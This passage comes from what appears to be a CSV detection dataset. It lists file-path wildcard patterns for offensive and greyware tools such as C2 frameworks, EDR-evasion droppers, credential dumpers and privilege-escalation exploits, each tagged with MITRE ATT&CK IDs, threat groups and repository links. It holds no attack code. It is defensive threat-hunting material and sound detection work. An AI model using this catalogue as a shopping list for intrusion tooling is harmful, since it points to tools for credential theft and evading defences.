in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*\enc_shellcode.h*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*\enum_av.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\enum_dns.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\ES.Alan.Core*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*\EternalHushCore.dll*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*\EternalHushCore\*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*\etw-fuck.cpp*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*\etw-fuck.exe*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*\ETWHash.*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" +"*\EventViewer-UACBypass*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" +"*\evil.dll*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*\evil.dll*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*\evil_pdf\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\EvilClippy*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*\evilclippy.cs*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" +"*\EvilnoVNC*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" +"*\evilSignatures.db*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*\exe_to_dll\*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","0","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*\Exegol-*.zip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\exegol.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\Exegol-images-*.zip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\Exegol-images-*\*docker*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\exfiltrate.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*\ExternalC2\*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*\FakeCmdLine*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\Fertliser.exe*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*\Fertliser.pdb*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*\Files\ContainersFileUrls.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*\find-computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\follina.py*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" +"*\FreeFileSync.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\FreeFileSync\Logs\*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\FreeFileSync_*_Windows_Setup.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\FreeFileSyncPortable_*.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\freeze.go","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*\FtpC2\*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" +"*\FudgeC2*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*\get_netconnections.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\GetBrowsers.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\get-desc-users.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Get-SpoolStatus.ps1*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"*\GetWebDAVStatus\","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*\GetWebDAVStatus_x64*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*\glit.exe*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*\glit-cli*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*\gmailC2.exe*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*\gocrack-1.0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*\gocrack-master.*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*\GodFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*\Godpotato\*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*\GoFetchLog.log*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"*\GoodSync-2*-*.log*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\GoodSync-vsub-Setup.exe*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*\goZulipC2*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" +"*\GPOddity\*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*\gpp_autologin.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\gpp_password.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\group_members.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Group3r.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*\Grouper2.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*\groupmembership.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\GzipB64.exe*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*\HackBrowserData*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"*\Hades.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or 